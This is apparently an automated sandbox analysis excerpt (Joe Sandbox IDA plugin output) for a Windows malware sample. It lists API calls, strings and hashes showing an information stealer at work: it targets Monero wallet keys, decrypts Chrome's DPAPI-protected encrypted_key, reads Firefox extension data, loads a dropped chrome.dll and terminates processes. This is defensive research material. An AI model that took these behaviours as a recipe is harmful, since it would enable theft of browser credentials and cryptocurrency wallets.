                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                                        • String ID: %dx%d
                                        • API String ID: 1695172769-2206825331
                                        • Opcode ID: 51d009b3ce7215b4282f569ff0544cac8aa042897b391a4438cba85eced4abd2
                                        • Instruction ID: 5bbe22658740200a0a5594147d383cc0313ed39ab3d636ebc2c47de1d7e49fcb
                                        • Opcode Fuzzy Hash: 51d009b3ce7215b4282f569ff0544cac8aa042897b391a4438cba85eced4abd2
                                        • Instruction Fuzzy Hash: 7B213DB5A44204EFDB14DFA8DD45FAEBBB8FB49710F104619FA15A7280C775A900CBA1
                                        APIs
                                        • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0097A098
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                        • API String ID: 1029625771-1545816527
                                        • Opcode ID: d1d0cfa0eedce6be558809f69b6f991d3a9f0f8286920e7e41c2799177b10343
                                        • Instruction ID: 344a457a8dc5ad1c5af43e8dd5ba10a5ef1cd71a8858fb6d9630e8a0429e045b
                                        • Opcode Fuzzy Hash: d1d0cfa0eedce6be558809f69b6f991d3a9f0f8286920e7e41c2799177b10343
                                        • Instruction Fuzzy Hash: D5F0B47964E205AFDF14AB74ED08B1E3764F397314F000A16F909936E0C3B458C4CB52
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,009896AE,00000000), ref: 00988EEB
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00988EF2
                                        • wsprintfW.USER32 ref: 00988F08
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesswsprintf
                                        • String ID: %hs
                                        • API String ID: 769748085-2783943728
                                        • Opcode ID: d67a6488f8c93aec8593294fdacbed7d8e2537327f7d7647427e2142e4ddfe6b
                                        • Instruction ID: 10aed9ee6fa4767e8b5c69e2b2150bf19008d298f9552cd64c3043f7e04c252b
                                        • Opcode Fuzzy Hash: d67a6488f8c93aec8593294fdacbed7d8e2537327f7d7647427e2142e4ddfe6b
                                        • Instruction Fuzzy Hash: AAE0B679A48209FFDB10DB94DD0AB6D77A8EB46701F000294FD0997240DAB1AA109B91
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 00988CF0: GetSystemTime.KERNEL32(00990E1B,0181EC50,009905B6,?,?,009713F9,?,0000001A,00990E1B,00000000,?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 00988D16
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0097AA11
                                        • lstrlen.KERNEL32(00000000,00000000), ref: 0097AB2F
                                        • lstrlen.KERNEL32(00000000), ref: 0097ADEC
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                        • DeleteFileA.KERNEL32(00000000), ref: 0097AE73
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 53203cf31708ffc56028588fc2a9e5d52bd59ee014874ca9cf04cb5abb27b027
                                        • Instruction ID: 2d139872395b3df9525405dc5700a2667d329ef500cae07934e7c46e0c3ec3f2
                                        • Opcode Fuzzy Hash: 53203cf31708ffc56028588fc2a9e5d52bd59ee014874ca9cf04cb5abb27b027
                                        • Instruction Fuzzy Hash: E0E1C0729101189BDB15FBA4DDA2FEE7339BFA4300F50855AF11672191EF386A4CCB62
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 00988CF0: GetSystemTime.KERNEL32(00990E1B,0181EC50,009905B6,?,?,009713F9,?,0000001A,00990E1B,00000000,?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 00988D16
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0097D581
                                        • lstrlen.KERNEL32(00000000), ref: 0097D798
                                        • lstrlen.KERNEL32(00000000), ref: 0097D7AC
                                        • DeleteFileA.KERNEL32(00000000), ref: 0097D82B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: ace30903c02fcc55cdf0fc33f41cb85f8508c99cb51d3814c8336010484ec729
                                        • Instruction ID: 44b92b2b88475915c2e8abdd82ebc9064a474449e4ecef30eeb096c52ab43541
                                        • Opcode Fuzzy Hash: ace30903c02fcc55cdf0fc33f41cb85f8508c99cb51d3814c8336010484ec729
                                        • Instruction Fuzzy Hash: C291C5729101089BDB04FBA4DDA6FEE7339BF94300F50456AF51676291EF386A48CB62
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 00988CF0: GetSystemTime.KERNEL32(00990E1B,0181EC50,009905B6,?,?,009713F9,?,0000001A,00990E1B,00000000,?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 00988D16
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0097D901
                                        • lstrlen.KERNEL32(00000000), ref: 0097DA9F
                                        • lstrlen.KERNEL32(00000000), ref: 0097DAB3
                                        • DeleteFileA.KERNEL32(00000000), ref: 0097DB32
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 28bc624f4a2ac618c835878f9299e12c6fab5d8153d4f8e1e18ab2d8ee4c67ca
                                        • Instruction ID: 7cc029fbec4c140eafbdbacd768355fd895b457c73bfa199f2ea7bbaa4580014
                                        • Opcode Fuzzy Hash: 28bc624f4a2ac618c835878f9299e12c6fab5d8153d4f8e1e18ab2d8ee4c67ca
                                        • Instruction Fuzzy Hash: 0081C4729101089BDF04FBA4DCA6FEE7339BF95300F50456AF51676291EF386A08CB62
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AdjustPointer
                                        • String ID:
                                        • API String ID: 1740715915-0
                                        • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                        • Instruction ID: 072e7f8d95bdd0b8804b4af86641d45c8c62061ba76913995215fb0f961ddb15
                                        • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                        • Instruction Fuzzy Hash: 8351487260124AAFEB268F16C851BBA77A8FF85310F28493EF90547592EB31EC40D790
                                        APIs
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 0097A664
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocLocallstrcpy
                                        • String ID: @$v10$v20
                                        • API String ID: 2746078483-278772428
                                        • Opcode ID: 9be1608884b396171fac14043a10f9944cbc73d348b0a4a4ad5463478baf58bb
                                        • Instruction ID: f2de12b00545fcdfa0418bcbfbc608772798885caf4eb779071c18a33e21d4b6
                                        • Opcode Fuzzy Hash: 9be1608884b396171fac14043a10f9944cbc73d348b0a4a4ad5463478baf58bb
                                        • Instruction Fuzzy Hash: F9513C71A10208EFDB18EFA8CD96FED7776BF94344F008118F90A5B691EB746A05CB52
                                        APIs
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                          • Part of subcall function 0097A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0097A13C
                                          • Part of subcall function 0097A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0097A161
                                          • Part of subcall function 0097A110: LocalAlloc.KERNEL32(00000040,?), ref: 0097A181
                                          • Part of subcall function 0097A110: ReadFile.KERNEL32(000000FF,?,00000000,0097148F,00000000), ref: 0097A1AA
                                          • Part of subcall function 0097A110: LocalFree.KERNEL32(0097148F), ref: 0097A1E0
                                          • Part of subcall function 0097A110: CloseHandle.KERNEL32(000000FF), ref: 0097A1EA
                                          • Part of subcall function 00988FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00988FE2
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00991678,00990D93), ref: 0097F64C
                                        • lstrlen.KERNEL32(00000000), ref: 0097F66B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                        • API String ID: 998311485-3310892237
                                        • Opcode ID: 2ecd6920920da47d110e8f744f996d0cc661ade03af20d16328b50753503e0d8
                                        • Instruction ID: d0fe8e29587e4da577c3e31a794e90845465e52c6514c537a73a3a81aab6377d
                                        • Opcode Fuzzy Hash: 2ecd6920920da47d110e8f744f996d0cc661ade03af20d16328b50753503e0d8
                                        • Instruction Fuzzy Hash: C551DF72D101089BDB08FBA4DDA6EED737DBFD4300F408569F51667291EE386A09CB62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen
                                        • String ID:
                                        • API String ID: 367037083-0
                                        • Opcode ID: 69195d1a451a99dedb7a4dbff5f93d9de9713bfa58386174101f84f97b238013
                                        • Instruction ID: 4a63ee9c435bcbac2632be97efaeb7cc26bd06a71f1f7a72a3fc11d9faf5d002
                                        • Opcode Fuzzy Hash: 69195d1a451a99dedb7a4dbff5f93d9de9713bfa58386174101f84f97b238013
                                        • Instruction Fuzzy Hash: 76413A71D00109DBDF04FFA4D895BEEB779AF98704F008419F416B6290EB78AA04CBA2
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0097A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0097A13C
                                          • Part of subcall function 0097A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0097A161
                                          • Part of subcall function 0097A110: LocalAlloc.KERNEL32(00000040,?), ref: 0097A181
                                          • Part of subcall function 0097A110: ReadFile.KERNEL32(000000FF,?,00000000,0097148F,00000000), ref: 0097A1AA
                                          • Part of subcall function 0097A110: LocalFree.KERNEL32(0097148F), ref: 0097A1E0
                                          • Part of subcall function 0097A110: CloseHandle.KERNEL32(000000FF), ref: 0097A1EA
                                          • Part of subcall function 00988FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00988FE2
                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0097A489
                                          • Part of subcall function 0097A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00974F3E,00000000,00000000), ref: 0097A23F
                                          • Part of subcall function 0097A210: LocalAlloc.KERNEL32(00000040,?,?,?,00974F3E,00000000,?), ref: 0097A251
                                          • Part of subcall function 0097A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00974F3E,00000000,00000000), ref: 0097A27A
                                          • Part of subcall function 0097A210: LocalFree.KERNEL32(?,?,?,?,00974F3E,00000000,?), ref: 0097A28F
                                          • Part of subcall function 0097A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0097A2D4
                                          • Part of subcall function 0097A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0097A2F3
                                          • Part of subcall function 0097A2B0: LocalFree.KERNEL32(?), ref: 0097A323
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                        • String ID: $"encrypted_key":"$DPAPI
                                        • API String ID: 2100535398-738592651
                                        • Opcode ID: d6bf5fa3e9510292359e871ca1dcdac75771786b61b0427b880971e9419fe52d
                                        • Instruction ID: 6ce49e556fe06f7a8937b4bf7c17636b62df34a486b4bc9fc5b16645e5264c3e
                                        • Opcode Fuzzy Hash: d6bf5fa3e9510292359e871ca1dcdac75771786b61b0427b880971e9419fe52d
                                        • Instruction Fuzzy Hash: 68311EB6D00109ABDF04DB94DD46AEFB7B9BBD8304F448518F905A7241E7359A04CBA2
                                        APIs
                                        • memset.MSVCRT ref: 0098967B
                                          • Part of subcall function 00988EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,009896AE,00000000), ref: 00988EEB
                                          • Part of subcall function 00988EE0: RtlAllocateHeap.NTDLL(00000000), ref: 00988EF2
                                          • Part of subcall function 00988EE0: wsprintfW.USER32 ref: 00988F08
                                        • OpenProcess.KERNEL32(00001001,00000000,?), ref: 0098973B
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00989759
                                        • CloseHandle.KERNEL32(00000000), ref: 00989766
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                        • String ID:
                                        • API String ID: 3729781310-0
                                        • Opcode ID: 809f841d892931a9b82ff7bacd0772f405dfc1b1b046e4d8e20533dbdce2786d
                                        • Instruction ID: c17c8d32ad18588a14e68f59ec224d7b206459deff1023f5a9b938d77a928cc3
                                        • Opcode Fuzzy Hash: 809f841d892931a9b82ff7bacd0772f405dfc1b1b046e4d8e20533dbdce2786d
